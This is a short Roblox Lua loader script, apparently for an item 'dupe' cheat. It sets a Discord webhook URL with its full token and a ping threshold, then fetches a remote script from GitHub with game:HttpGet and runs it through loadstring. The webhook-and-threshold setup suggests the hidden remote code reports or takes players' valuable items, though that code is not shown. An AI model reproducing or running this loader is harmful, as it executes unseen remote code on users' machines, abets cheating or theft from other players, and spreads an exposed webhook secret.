local Webhook = "https://discord.com/api/webhooks/1444640728801218651/g6MrLJ5xDi-khkcLIhBL2kjweunlzb1oKRWWNvVDgizl1mYykpedYBQ6xA2s7eVMEsTV"

getgenv().UserPingThreshold = 50000000


-- =================================================================================
--      SCRIPT LOADER - DO NOT EDIT BELOW THIS LINE
-- =================================================================================

if Webhook and Webhook:match("discord.com/api/webhooks") then
    getgenv().UserWebhookURL = Webhook
else
    return
end

loadstring(game:HttpGet('https://raw.githubusercontent.com/LXZRz/dupe/main/dupe.lua', true))()
